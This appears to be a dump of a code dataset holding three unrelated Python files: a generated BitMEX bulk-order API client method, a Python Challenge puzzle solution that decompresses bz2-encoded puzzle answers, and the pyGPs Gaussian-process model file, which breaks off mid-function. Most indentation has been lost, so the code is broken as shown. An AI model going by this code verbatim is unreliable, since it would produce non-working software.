This endpoint is used for placing bulk orders. Valid order types are Market, Limit, Stop, StopLimit, MarketIfTouched, LimitIfTouched, MarketWithLeftOverAsLimit, and Pegged. Each individual order object in the array should have the same properties as an individual POST /order call. This endpoint is much faster for getting many orders into the book at once. Because it reduces load on BitMEX systems, this endpoint is ratelimited at `ceil(0.1 * orders)`. Submitting 10 orders via a bulk order call will only count as 1 request, 15 as 2, 32 as 4, and so on. For now, only `application/json` is supported on this endpoint. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_new_bulk(async=True)
>>> result = thread.get()
:param async bool
:param str orders: An array of orders.
:return: list[Order]
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.order_new_bulk_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.order_new_bulk_with_http_info(**kwargs) # noqa: E501
return data
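    # --- Illustrative usage sketch (editor-added commentary, not generated code) ---
    # Placing several orders in one ratelimit-friendly call; assumes `api` is a
    # configured, authenticated instance of this class. The `orders` param is a
    # JSON-encoded array, matching the str type documented above:
    # >>> import json
    # >>> orders = json.dumps([
    # ...     {'symbol': 'XBTUSD', 'orderQty': 100, 'price': 6400.0},
    # ...     {'symbol': 'XBTUSD', 'orderQty': 100, 'price': 6300.0},
    # ... ])
    # >>> placed = api.order_new_bulk(orders=orders)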
def order_new_bulk_with_http_info(self, **kwargs): # noqa: E501
"""Create multiple new orders for the same symbol. # noqa: E501
This endpoint is used for placing bulk orders. Valid order types are Market, Limit, Stop, StopLimit, MarketIfTouched, LimitIfTouched, MarketWithLeftOverAsLimit, and Pegged. Each individual order object in the array should have the same properties as an individual POST /order call. This endpoint is much faster for getting many orders into the book at once. Because it reduces load on BitMEX systems, this endpoint is ratelimited at `ceil(0.1 * orders)`. Submitting 10 orders via a bulk order call will only count as 1 request, 15 as 2, 32 as 4, and so on. For now, only `application/json` is supported on this endpoint. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.order_new_bulk_with_http_info(async=True)
>>> result = thread.get()
:param async bool
:param str orders: An array of orders.
:return: list[Order]
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['orders'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method order_new_bulk" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'orders' in params:
form_params.append(('orders', params['orders'])) # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/xml', 'text/xml', 'application/javascript', 'text/javascript']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['apiKey', 'apiNonce', 'apiSignature'] # noqa: E501
return self.api_client.call_api(
'/order/bulk', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='list[Order]', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
[dataset row boundary: per-file quality-signal columns for the preceding sample omitted. Next sample: Python/python-tutorials/python-challenge/integrity.py — repo zhongyangynag/code-study @ 5410929554107a384a09d899c6fa3d16ed383d2b, license MIT, 339 bytes, Python]
#!/usr/bin/env python3
# Python Challenge "integrity" solution: the username and password are stored
# as bz2-compressed byte strings; decompressing them reveals the credentials.
import bz2

un = b'BZh91AY&SYA\xaf\x82\r\x00\x00\x01\x01\x80\x02\xc0\x02\x00 \x00!\x9ah3M\x07<]\xc9\x14\xe1BA\x06\xbe\x084'
pw = b'BZh91AY&SY\x94$|\x0e\x00\x00\x00\x81\x00\x03$ \x00!\x9ah3M\x13<]\xc9\x14\xe1BBP\x91\xf08'

print(bz2.BZ2Decompressor().decompress(un))  # huge
print(bz2.BZ2Decompressor().decompress(pw))  # file
[dataset row boundary: per-file quality-signal columns for the preceding sample omitted. Next sample: pyGPs/Core/gp.py — repo Corentin-LF/pyGPs @ b9d36777584cd53756bd4311c3c20ea52e945451, license BSD-2-Clause, 50,482 bytes, Python]
from __future__ import division
from __future__ import absolute_import
from builtins import str
from builtins import range
from builtins import object
from past.utils import old_div
#================================================================================
# Marion Neumann [marion dot neumann at uni-bonn dot de]
# Daniel Marthaler [dan dot marthaler at gmail dot com]
# Shan Huang [shan dot huang at iais dot fraunhofer dot de]
# Kristian Kersting [kristian dot kersting at cs dot tu-dortmund dot de]
#
# This file is part of pyGPs.
# The software package is released under the BSD 2-Clause (FreeBSD) License.
#
# Copyright (c) by
# Marion Neumann, Daniel Marthaler, Shan Huang & Kristian Kersting, 18/02/2014
#================================================================================
# MEANING OF NOTATION:
#
# inffunc function specifying the inference method
# covfunc prior covariance function (see below)
# meanfunc prior mean function
# likfunc likelihood function
# x n by D matrix of training inputs
# y column vector of length n of training targets
# xs n by D matrix of test inputs
# ys column vector of length nn of true test targets (optional)
# nlZ returned value of the negative log marginal likelihood
# dnlZ column vector of partial derivatives of the negative
# log marginal likelihood w.r.t. each hyperparameter
# ym column vector (of length ns) of predictive output means
# ys2 column vector (of length ns) of predictive output variances
# fm column vector (of length ns) of predictive latent means
# fs2 column vector (of length ns) of predictive latent variances
# lp column vector (of length ns) of log predictive probabilities
# post struct representation of the (approximate) posterior
# post consists of post.alpha, post.L, post.sW
#
# This is an object-oriented Python implementation of GPML functionality
# (Copyright (c) by Carl Edward Rasmussen and Hannes Nickisch, 2011-02-18),
# based on the functional version of the Python implementation
# (Copyright (c) by Marion Neumann and Daniel Marthaler, 20/05/2013).
#
# Copyright (c) by Marion Neumann and Shan Huang, 30/09/2013
import itertools
import numpy as np
import matplotlib.pyplot as plt
from . import inf, mean, lik, cov, opt
from .tools import unique, jitchol, solve_chol
from copy import deepcopy
import pyGPs
from pyGPs.Core.cov import FITCOfKernel
import logging
SHADEDCOLOR = [0.7539, 0.89453125, 0.62890625, 1.0]
MEANCOLOR = [ 0.2109375, 0.63385, 0.1796875, 1.0]
DATACOLOR = [0.12109375, 0.46875, 1., 1.0]
class GP(object):
'''
Base class for GP model.
'''
def __init__(self):
super(GP, self).__init__()
self.usingDefaultMean = True # whether the default mean function is currently in use
self.meanfunc = None # mean function
self.covfunc = None # covariance function
self.likfunc = None # likelihood function
self.inffunc = None # inference function
self.optimizer = None # optimizer object
self.nlZ = None # negative log marginal likelihood
self.dnlZ = None # column vector of partial derivatives of the negative
# log marginal likelihood w.r.t. each hyperparameter
self.posterior = None # struct representation of the (approximate) posterior
self.x = None # n by D matrix of training inputs
self.y = None # column vector of length n of training targets
self.xs = None # n by D matrix of test inputs
self.ys = None # column vector of length nn of true test targets (optional)
self.ym = None # column vector (of length ns) of predictive output means
self.ys2 = None # column vector (of length ns) of predictive output variances
self.fm = None # column vector (of length ns) of predictive latent means
self.fs2 = None # column vector (of length ns) of predictive latent variances
self.lp = None # column vector (of length ns) of log predictive probabilities
self.logger = logging.getLogger(__name__)
def __str__(self):
strvalue = 'To get the properties of the model use:\n'+\
'model.nlZ # negative log marginal likelihood\n'+\
'model.dnlZ.cov # derivatives of cov func of negative log marginal likelihood\n'+\
'model.dnlZ.lik # derivatives of lik func of negative log marginal likelihood\n'+\
'model.dnlZ.mean # derivatives of mean func of negative log marginal likelihood\n'+\
'model.posterior # posterior structure\n'+\
'model.covfunc.hyp # hyperparameters of cov func\n'+\
'model.meanfunc.hyp # hyperparameters of mean func\n'+\
'model.likfunc.hyp # hyperparameters of lik func\n'+\
'model.fm # latent mean\n'+\
'model.fs2 # latent variance\n'+\
'model.ym # predictive mean\n'+\
'model.ys2 # predictive variance\n'+\
'model.lp # log predictive probability'
return strvalue
def __repr__(self):
strvalue = str(type(self))+': '+\
'to get the properties of the model use:\n'+\
'model.nlZ # negative log marginal likelihood\n'+\
'model.dnlZ.cov # derivatives of cov func of negative log marginal likelihood\n'+\
'model.dnlZ.lik # derivatives of lik func of negative log marginal likelihood\n'+\
'model.dnlZ.mean # derivatives of mean func of negative log marginal likelihood\n'+\
'model.posterior # posterior structure\n'+\
'model.covfunc.hyp # hyperparameters of cov func\n'+\
'model.meanfunc.hyp # hyperparameters of mean func\n'+\
'model.likfunc.hyp # hyperparameters of lik func\n'+\
'model.fm # latent mean\n'+\
'model.fs2 # latent variance\n'+\
'model.ym # predictive mean\n'+\
'model.ys2 # predictive variance\n'+\
'model.lp # log predictive probability'
return strvalue
def setData(self, x, y):
'''
Set training inputs and training labels for the model.
:param x: training inputs in shape (n,D)
:param y: training labels in shape (n,1)
Note this method will reshape x and y to the correct
shape if they are given as 1d arrays.
'''
# check whether the number of inputs and labels match
assert x.shape[0] == y.shape[0], "number of inputs and labels does not match"
# check the shape of inputs
# transform to the correct shape
if x.ndim == 1:
x = np.reshape(x, (x.shape[0],1))
if y.ndim == 1:
y = np.reshape(y, (y.shape[0],1))
self.x = x
self.y = y
if self.usingDefaultMean:
c = np.mean(y)
self.meanfunc = mean.Const(c) # adapt default prior mean wrt. training labels
def plotData_1d(self, axisvals=None):
'''
Toy method for plotting 1d data of the model.
:param list axisvals: [min_x, max_x, min_y, max_y] setting the plot range
'''
plt.figure()
plt.plot(self.x, self.y, ls='None', marker='+', color=DATACOLOR, ms=12, mew=2)
if axisvals:
plt.axis(axisvals)
plt.grid()
plt.xlabel('input x')
plt.ylabel('target y')
plt.show()
def plotData_2d(self,x1,x2,t1,t2,p1,p2,axisvals=None):
'''
Toy method for plotting 2d data of the model. \n
For plotting, we superimpose the data points with the posterior equi-probability contour
lines for the probability of class two given complete information about the generating mechanism.
:param x1: inputs for class +1
:param x2: inputs for class -1
:param t1: meshgrid array for the first axis
:param t2: meshgrid array for the second axis
:param p1,p2: contour lines contain p2/(p1+p2)
:param list axisvals: [min_x, max_x, min_y, max_y] setting the plot range
That is to say, the contour is plotted by plt.contour(t1, t2, p2/(p1+p2) )
Note these parameters are (only) used for the hard-coded classification demo data.
'''
fig = plt.figure()
plt.plot(x1[:,0], x1[:,1], 'b+', markersize = 12)
plt.plot(x2[:,0], x2[:,1], 'r+', markersize = 12)
pc = plt.contour(t1, t2, np.reshape(old_div(p2,(p1+p2)), (t1.shape[0],t1.shape[1]) ))
fig.colorbar(pc)
plt.grid()
if axisvals:
plt.axis(axisvals)
plt.show()
def setPrior(self, mean=None, kernel=None):
'''
Set prior mean and covariance other than the default setting of the current model.
:param mean: instance of mean class. (e.g. mean.Linear())
:param kernel: instance of covariance class. (e.g. cov.RBF())
'''
# check the type of inputs
# ensure they are the right class before setting prior
if not mean is None:
assert isinstance(mean, pyGPs.mean.Mean), "mean function is not an instance of pyGPs.mean.Mean"
self.meanfunc = mean
self.usingDefaultMean = False
if not kernel is None:
assert isinstance(kernel, pyGPs.cov.Kernel), "cov function is not an instance of pyGPs.cov.Kernel"
self.covfunc = kernel
if type(kernel) is cov.Pre:
self.usingDefaultMean = False
def setOptimizer(self, method, num_restarts=None, min_threshold=None, meanRange=None, covRange=None, likRange=None):
'''
This method is used to specify the optimization configuration. By default, gp uses a single "minimize" run.
:param method: Optimization methods. Possible values are:\n
"Minimize" -> minimize by Carl Rasmussen (python implementation of "minimize" in GPML)\n
"CG" -> conjugent gradient\n
"BFGS" -> quasi-Newton method of Broyden, Fletcher, Goldfarb, and Shanno (BFGS)\n
"SCG" -> scaled conjugent gradient (faster than CG)\n
:param num_restarts: Set if you want to run the optimization multiple times with different initial guesses.
It specifies the maximum number of runs/restarts/trials.
:param min_threshold: Set if you want to run the optimization multiple times with different initial guesses.
It specifies the threshold for the objective function value; optimization stops once this value is reached.
:param meanRange: The range of initial guess for mean hyperparameters.
e.g. meanRange = [(-2,2), (-5,5), (0,1)].
Each tuple specifies the range (low, high) of this hyperparameter.
This is only the range of the initial guess; during optimization, hyperparameters may move outside this range.
(-5,5) for each hyperparameter by default.
:param covRange: The range of initial guess for kernel hyperparameters. Usage see meanRange
:param likRange: The range of initial guess for likelihood hyperparameters. Usage see meanRange
'''
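# Base-class stub: concrete optimizer configuration happens in the subclass
# overrides (see GPR.setOptimizer and GPC.setOptimizer below).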
pass
def optimize40(self, x=None, y=None, numIterations=40):
'''
Train optimal hyperparameters based on training data (40 iterations by default),
then propagate the new hyperparameters to all mean/cov/lik functions.
:param x: training inputs in shape (n,D)
:param y: training labels in shape (n,1)
'''
# check whether the number of inputs and labels match
if x is not None and y is not None:
assert x.shape[0] == y.shape[0], "number of inputs and labels does not match"
# check the shape of inputs
# transform to the correct shape
if not x is None:
if x.ndim == 1:
x = np.reshape(x, (x.shape[0],1))
self.x = x
if not y is None:
if y.ndim == 1:
y = np.reshape(y, (y.shape[0],1))
self.y = y
if self.usingDefaultMean and self.meanfunc is None:
c = np.mean(y)
self.meanfunc = mean.Const(c) # adapt default prior mean wrt. training labels
# optimize
optimalHyp, optimalNlZ = self.optimizer.findMin(self.x, self.y, numIters = numIterations)
self.nlZ = optimalNlZ
# apply optimal hyp to all mean/cov/lik functions here
self.optimizer._apply_in_objects(optimalHyp)
self.getPosterior()
def optimize(self, x=None, y=None, numIterations=1000):
'''
Train optimal hyperparameters based on training data,
then propagate the new hyperparameters to all mean/cov/lik functions.
:param x: training inputs in shape (n,D)
:param y: training labels in shape (n,1)
'''
# check whether the number of inputs and labels match
if x is not None and y is not None:
assert x.shape[0] == y.shape[0], "number of inputs and labels does not match"
# check the shape of inputs
# transform to the correct shape
if not x is None:
if x.ndim == 1:
x = np.reshape(x, (x.shape[0],1))
self.x = x
if not y is None:
if y.ndim == 1:
y = np.reshape(y, (y.shape[0],1))
self.y = y
if self.usingDefaultMean and self.meanfunc is None:
c = np.mean(y)
self.meanfunc = mean.Const(c) # adapt default prior mean wrt. training labels
# optimize
optimalHyp, optimalNlZ = self.optimizer.findMin(self.x, self.y, numIters = numIterations)
self.nlZ = optimalNlZ
# apply optimal hyp to all mean/cov/lik functions here
self.optimizer._apply_in_objects(optimalHyp)
self.getPosterior()
def getPosterior(self, x=None, y=None, der=True):
'''
Fit the training data. Update the negative log marginal likelihood (nlZ),
the partial derivatives of nlZ w.r.t. each hyperparameter (dnlZ),
and the struct representation of the (approximate) posterior (post),
which consists of post.alpha, post.L, post.sW.
nlZ, dnlZ, post = getPosterior(x, y, der=True)\n
nlZ, post = getPosterior(x, y, der=False )
:param x: training inputs in shape (n,D)
:param y: training labels in shape (n,1)
:param boolean der: flag for whether to compute derivatives
:return: negative log marginal likelihood (nlZ), derivatives of nlZ (dnlZ), posterior structure (post)
You can print post to see a description of the posterior,
or see pyGPs.Core.inf for details.
'''
# check whether the number of inputs and labels match
if x is not None and y is not None:
assert x.shape[0] == y.shape[0], "number of inputs and labels does not match"
# check the shape of inputs
# transform to the correct shape
if not x is None:
if x.ndim == 1:
x = np.reshape(x, (x.shape[0],1))
self.x = x
if not y is None:
if y.ndim == 1:
y = np.reshape(y, (y.shape[0],1))
self.y = y
if self.usingDefaultMean and self.meanfunc is None:
c = np.mean(y)
self.meanfunc = mean.Const(c) # adapt default prior mean wrt. training labels
# call inference method
if isinstance(self.likfunc, lik.Erf): #or is instance(self.likfunc, lik.Logistic):
uy = unique(self.y)
ind = ( uy != 1 )
if any( uy[ind] != -1):
raise Exception('You attempt classification using labels different from {+1,-1}')
if not der:
post, nlZ = self.inffunc.evaluate(self.meanfunc, self.covfunc, self.likfunc, self.x, self.y, 2)
self.nlZ = nlZ
self.posterior = deepcopy(post)
return nlZ, post
else:
post, nlZ, dnlZ = self.inffunc.evaluate(self.meanfunc, self.covfunc, self.likfunc, self.x, self.y, 3)
self.nlZ = nlZ
self.dnlZ = deepcopy(dnlZ)
self.posterior = deepcopy(post)
return nlZ, dnlZ, post
def predict(self, xs, ys=None):
'''
Prediction of test points (given by xs) based on training data of the current model.
This method will output the following values:\n
predictive output means (ym),\n
predictive output variances (ys2),\n
predictive latent means (fm),\n
predictive latent variances (fs2),\n
log predictive probabilities (lp).\n
These values are also stored as model properties. (e.g. model.ym)
:param xs: test input in shape of nn by D
:param ys: test target (optional), in shape nn by 1 if given
:return: ym, ys2, fm, fs2, lp
'''
# check the shape of inputs
# transform to correct shape if necessary
if xs.ndim == 1:
xs = np.reshape(xs, (xs.shape[0],1))
self.xs = xs
if not ys is None:
if ys.ndim == 1:
ys = np.reshape(ys, (ys.shape[0],1))
self.ys = ys
meanfunc = self.meanfunc
covfunc = self.covfunc
likfunc = self.likfunc
inffunc = self.inffunc
x = self.x
y = self.y
if self.posterior is None:
self.getPosterior()
alpha = self.posterior.alpha
L = self.posterior.L
sW = self.posterior.sW
nz = list(range(len(alpha[:,0]))) # non-sparse representation
if len(L) == 0: # in case L is not provided, we compute it
K = covfunc.getCovMatrix(x=x[nz,:], mode='train')
#L = np.linalg.cholesky( (np.eye(nz) + np.dot(sW,sW.T)*K).T )
L = jitchol( (np.eye(len(nz)) + np.dot(sW,sW.T)*K).T )
Ltril = np.all( np.tril(L,-1) == 0 ) # is L an upper triangular matrix?
ns = xs.shape[0] # number of data points
nperbatch = 1000 # number of data points per mini batch
nact = 0 # number of already processed test data points
ymu = np.zeros((ns,1))
ys2 = np.zeros((ns,1))
fmu = np.zeros((ns,1))
fs2 = np.zeros((ns,1))
lp = np.zeros((ns,1))
while nact<=ns-1: # process minibatches of test cases to save memory
ids = list(range(nact,min(nact+nperbatch,ns))) # data points to process
kss = covfunc.getCovMatrix(z=xs[ids,:], mode='self_test') # self-variances
if isinstance(covfunc, FITCOfKernel):
Ks = covfunc.getCovMatrix(x=x, z=xs[ids,:], mode='cross') # cross-covariances
Ks = Ks[nz,:]
else:
Ks = covfunc.getCovMatrix(x=x[nz,:], z=xs[ids,:], mode='cross') # cross-covariances
ms = meanfunc.getMean(xs[ids,:])
N = (alpha.shape)[1] # number of alphas (usually 1; more in case of sampling)
Fmu = np.tile(ms,(1,N)) + np.dot(Ks.T,alpha[nz]) # conditional mean fs|f
fmu[ids] = np.reshape(old_div(Fmu.sum(axis=1),N),(len(ids),1)) # predictive means
if Ltril: # L is triangular => use Cholesky parameters (alpha,sW,L)
V = np.linalg.solve(L.T,np.tile(sW,(1,len(ids)))*Ks)
fs2[ids] = kss - np.array([(V*V).sum(axis=0)]).T # predictive variances
else: # L is not triangular => use alternative parametrization
fs2[ids] = kss + np.array([(Ks*np.dot(L,Ks)).sum(axis=0)]).T # predictive variances
fs2[ids] = np.maximum(fs2[ids],0) # remove numerical noise i.e. negative variances
Fs2 = np.tile(fs2[ids],(1,N)) # we have multiple values in case of sampling
if ys is None:
Lp, Ymu, Ys2 = likfunc.evaluate(None,Fmu[:],Fs2[:],None,None,3)
else:
Lp, Ymu, Ys2 = likfunc.evaluate(np.tile(ys[ids],(1,N)), Fmu[:], Fs2[:],None,None,3)
lp[ids] = np.reshape( old_div(np.reshape(Lp,(np.prod(Lp.shape),N)).sum(axis=1),N) , (len(ids),1) ) # log probability; sample averaging
ymu[ids] = np.reshape( old_div(np.reshape(Ymu,(np.prod(Ymu.shape),N)).sum(axis=1),N) ,(len(ids),1) ) # predictive mean ys|y and ...
ys2[ids] = np.reshape( old_div(np.reshape(Ys2,(np.prod(Ys2.shape),N)).sum(axis=1),N) , (len(ids),1) ) # .. variance
nact = ids[-1]+1 # set counter to index of next data point
self.ym = ymu
self.ys2 = ys2
self.lp = lp
self.fm = fmu
self.fs2 = fs2
if ys is None:
return ymu, ys2, fmu, fs2, None
else:
return ymu, ys2, fmu, fs2, lp
def predict_with_posterior(self, post, xs, ys=None):
'''
Prediction of test points (given by xs) based on training data
of the current model with posterior already provided.
(i.e. you already have the posterior and thus don't need the fitting phase.)
This method will output the following values:\n
predictive output means (ym),\n
predictive output variances (ys2),\n
predictive latent means (fm),\n
predictive latent variances (fs2),\n
log predictive probabilities (lp).\n
These values are also stored as model properties. (e.g. model.ym)
:param post: struct representation of posterior
:param xs: test input
:param ys: test target(optional)
:return: ym, ys2, fm, fs2, lp
'''
# check the shape of inputs
# transform to correct shape if necessary
if xs.ndim == 1:
xs = np.reshape(xs, (xs.shape[0],1))
self.xs = xs
if not ys is None:
if ys.ndim == 1:
ys = np.reshape(ys, (ys.shape[0],1))
self.ys = ys
meanfunc = self.meanfunc
covfunc = self.covfunc
likfunc = self.likfunc
inffunc = self.inffunc
x = self.x
y = self.y
self.posterior = deepcopy(post)
alpha = post.alpha
L = post.L
sW = post.sW
nz = list(range(len(alpha[:,0]))) # non-sparse representation
if len(L) == 0: # in case L is not provided, we compute it
K = covfunc.getCovMatrix(x=x[nz,:], mode='train')
#L = np.linalg.cholesky( (np.eye(nz) + np.dot(sW,sW.T)*K).T )
L = jitchol( (np.eye(len(nz)) + np.dot(sW,sW.T)*K).T )
Ltril = np.all( np.tril(L,-1) == 0 ) # is L an upper triangular matrix?
ns = xs.shape[0] # number of data points
nperbatch = 1000 # number of data points per mini batch
nact = 0 # number of already processed test data points
ymu = np.zeros((ns,1))
ys2 = np.zeros((ns,1))
fmu = np.zeros((ns,1))
fs2 = np.zeros((ns,1))
lp = np.zeros((ns,1))
while nact<=ns-1: # process minibatches of test cases to save memory
ids = list(range(nact,min(nact+nperbatch,ns))) # data points to process; 'ids' avoids shadowing the builtin id()
kss = covfunc.getCovMatrix(z=xs[ids,:], mode='self_test') # self-variances
Ks = covfunc.getCovMatrix(x=x[nz,:], z=xs[ids,:], mode='cross') # cross-covariances
ms = meanfunc.getMean(xs[ids,:])
N = (alpha.shape)[1] # number of alphas (usually 1; more in case of sampling)
Fmu = np.tile(ms,(1,N)) + np.dot(Ks.T,alpha[nz]) # conditional mean fs|f
fmu[ids] = np.reshape(old_div(Fmu.sum(axis=1),N),(len(ids),1)) # predictive means
if Ltril: # L is triangular => use Cholesky parameters (alpha,sW,L)
V = np.linalg.solve(L.T,np.tile(sW,(1,len(ids)))*Ks)
fs2[ids] = kss - np.array([(V*V).sum(axis=0)]).T # predictive variances
else: # L is not triangular => use alternative parametrization
fs2[ids] = kss + np.array([(Ks*np.dot(L,Ks)).sum(axis=0)]).T # predictive variances
fs2[ids] = np.maximum(fs2[ids],0) # remove numerical noise i.e. negative variances
Fs2 = np.tile(fs2[ids],(1,N)) # we have multiple values in case of sampling
if ys is None:
Lp, Ymu, Ys2 = likfunc.evaluate(None,Fmu[:],Fs2[:],None,None,3)
else:
Lp, Ymu, Ys2 = likfunc.evaluate(np.tile(ys[ids],(1,N)), Fmu[:], Fs2[:],None,None,3)
lp[ids] = np.reshape( old_div(np.reshape(Lp,(np.prod(Lp.shape),N)).sum(axis=1),N) , (len(ids),1) ) # log probability; sample averaging
ymu[ids] = np.reshape( old_div(np.reshape(Ymu,(np.prod(Ymu.shape),N)).sum(axis=1),N) ,(len(ids),1) ) # predictive mean ys|y and ...
ys2[ids] = np.reshape( old_div(np.reshape(Ys2,(np.prod(Ys2.shape),N)).sum(axis=1),N) , (len(ids),1) ) # .. variance
nact = ids[-1]+1 # set counter to index of next data point
self.ym = ymu
self.ys2 = ys2
self.lp = lp
self.fm = fmu
self.fs2 = fs2
if ys is None:
return ymu, ys2, fmu, fs2, None
else:
return ymu, ys2, fmu, fs2, lp
class GPR(GP):
'''
Model for Gaussian Process Regression
'''
def __init__(self):
super(GPR, self).__init__()
self.meanfunc = mean.Zero() # default prior mean
self.covfunc = cov.RBF() # default prior covariance
self.likfunc = lik.Gauss() # likelihood with default noise variance 0.1
self.inffunc = inf.Exact() # inference method
self.optimizer = opt.Minimize(self) # default optimizer
def setNoise(self,log_sigma):
'''
Set a noise level other than the default value.
:param log_sigma: logarithm of the noise sigma
'''
self.likfunc = lik.Gauss(log_sigma)
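# For example (editor-added note), a noise standard deviation of 0.1
# corresponds to:
# >>> model.setNoise(log_sigma=np.log(0.1))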
def setOptimizer(self, method, num_restarts=None, min_threshold=None, meanRange=None, covRange=None, likRange=None):
'''
Overrides the base class; see pyGPs.gp.GP.setOptimizer for usage.
'''
conf = None
if (num_restarts!=None) or (min_threshold!=None):
conf = pyGPs.Optimization.conf.random_init_conf(self.meanfunc,self.covfunc,self.likfunc)
conf.num_restarts = num_restarts
conf.min_threshold = min_threshold
if not meanRange is None:
conf.meanRange = meanRange
if not covRange is None:
conf.covRange = covRange
if not likRange is None:
conf.likRange = likRange
if method == "Minimize":
self.optimizer = opt.Minimize(self,conf)
elif method == "SCG":
self.optimizer = opt.SCG(self,conf)
elif method == "CG":
self.optimizer = opt.CG(self,conf)
elif method == "BFGS":
self.optimizer = opt.BFGS(self,conf)
elif method == "Nelder-Mead":
self.optimizer = opt.Simplex(self, conf)
else:
raise Exception('Optimization method is not set correctly in setOptimizer')
def plot(self,axisvals=None):
'''
Plot 1d GP regression result.
:param list axisvals: [min_x, max_x, min_y, max_y] setting the plot range
'''
xs = self.xs # test point
x = self.x
y = self.y
ym = self.ym # predictive test mean
ys2 = self.ys2 # predictive test variance
plt.figure()
xss = np.reshape(xs,(xs.shape[0],))
ymm = np.reshape(ym,(ym.shape[0],))
ys22 = np.reshape(ys2,(ys2.shape[0],))
plt.plot(x, y, color=DATACOLOR, ls='None', marker='+',ms=12, mew=2)
plt.plot(xs, ym, color=MEANCOLOR, ls='-', lw=3.)
plt.fill_between(xss,ymm + 2.*np.sqrt(ys22), ymm - 2.*np.sqrt(ys22), facecolor=SHADEDCOLOR,linewidths=0.0)
plt.grid()
if not axisvals is None:
plt.axis(axisvals)
plt.xlabel('input x')
plt.ylabel('target y')
plt.show()
def useInference(self, newInf):
'''
Use an inference technique other than the default exact inference.
:param str newInf: 'Laplace' or 'EP'
'''
if newInf == "Laplace":
self.inffunc = inf.Laplace()
elif newInf == "EP":
self.inffunc = inf.EP()
else:
raise Exception('Possible inf values are "Laplace", "EP".')
def useLikelihood(self,newLik):
'''
Use another likelihood function other than default Gaussian likelihood.
:param str newLik: 'Laplace'
'''
if newLik == "Laplace":
self.likfunc = lik.Laplace()
self.inffunc = inf.EP()
else:
raise Exception('Possible lik values are "Laplace".')
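# Illustrative usage sketch for GPR on synthetic 1-d data; the numbers are
# placeholders, and optimize()/predict() are the standard entry points used
# elsewhere in this file.
def _demo_gpr_usage():
    import numpy as np
    x = np.linspace(-3, 3, 30)[:, None]                     # training inputs, shape (30,1)
    y = np.sin(x) + 0.1 * np.random.randn(30, 1)            # noisy targets
    xs = np.linspace(-3, 3, 100)[:, None]                   # test inputs
    model = GPR()
    model.setNoise(log_sigma=np.log(0.1))                   # optional noise override
    model.setOptimizer("Minimize", num_restarts=10)         # random-restart hyperparameter search
    model.optimize(x, y)                                    # fit hyperparameters
    ymu, ys2, fmu, fs2, lp = model.predict(xs)
    return ymu, ys2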
class GPC(GP):
'''
Model for Gaussian Process Classification.
'''
def __init__(self):
super(GPC, self).__init__()
self.meanfunc = mean.Zero() # default prior mean
self.covfunc = cov.RBF() # default prior covariance
        self.likfunc = lik.Erf()            # erf likelihood
self.inffunc = inf.EP() # default inference method
self.optimizer = opt.Minimize(self) # default optimizer
def setOptimizer(self, method, num_restarts=None, min_threshold=None, meanRange=None, covRange=None, likRange=None):
'''
        Overrides the base class; see pyGPs.gp.GP.setOptimizer for usage.
'''
conf = None
if (num_restarts!=None) or (min_threshold!=None):
conf = pyGPs.Optimization.conf.random_init_conf(self.meanfunc,self.covfunc,self.likfunc)
conf.num_restarts = num_restarts
conf.min_threshold = min_threshold
if not meanRange is None:
conf.meanRange = meanRange
if not covRange is None:
conf.covRange = covRange
if not likRange is None:
conf.likRange = likRange
if method == "Minimize":
self.optimizer = opt.Minimize(self,conf)
elif method == "SCG":
self.optimizer = opt.SCG(self,conf)
elif method == "CG":
self.optimizer = opt.CG(self,conf)
elif method == "BFGS":
self.optimizer = opt.BFGS(self,conf)
def plot(self,x1,x2,t1,t2,axisvals=None):
'''
Plot 2d GP Classification result.
For plotting, we superimpose the data points with the posterior equi-probability contour
lines for the probability of class two given complete information about the generating mechanism.
:param x1: inputs for class +1
:param x2: inputs for class -1
:param t1: meshgrid array for the first axis
:param t2: meshgrid array for the second axis
:param list axisvals: [min_x, max_x, min_y, max_y] setting the plot range
Note these parameters are (only) used for our hard-coded data for classification demo.
'''
fig = plt.figure()
plt.plot(x1[:,0], x1[:,1], 'b+', markersize = 12)
plt.plot(x2[:,0], x2[:,1], 'r+', markersize = 12)
pc = plt.contour(t1, t2, np.reshape(np.exp(self.lp), (t1.shape[0],t1.shape[1]) ))
fig.colorbar(pc)
plt.grid()
if not axisvals is None:
plt.axis(axisvals)
plt.show()
def useInference(self, newInf):
'''
        Use another inference technique other than the default EP inference.
:param str newInf: 'Laplace'
'''
if newInf == "Laplace":
self.inffunc = inf.Laplace()
else:
raise Exception('Possible inf values are "Laplace".')
def useLikelihood(self,newLik):
'''
Use another likelihood function other than default error function.
(Not used in this version)
:param str newLik: 'Logistic'
'''
if newLik == "Logistic":
raise Exception("Logistic likelihood is currently not implemented.")
#self.likfunc = lik.Logistic()
else:
raise Exception('Possible lik values are "Logistic".')
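# Illustrative usage sketch for binary GPC: labels must be +1/-1, and passing
# ys of ones to predict() (as in the pyGPs classification demos) yields the
# log probability of class +1 that plot() visualises via self.lp.  The data
# and grid here are synthetic placeholders.
def _demo_gpc_usage():
    import numpy as np
    n = 40
    x1 = np.random.randn(n, 2) + 1.5                        # class +1 inputs
    x2 = np.random.randn(n, 2) - 1.5                        # class -1 inputs
    x = np.vstack((x1, x2))
    y = np.vstack((np.ones((n, 1)), -np.ones((n, 1))))
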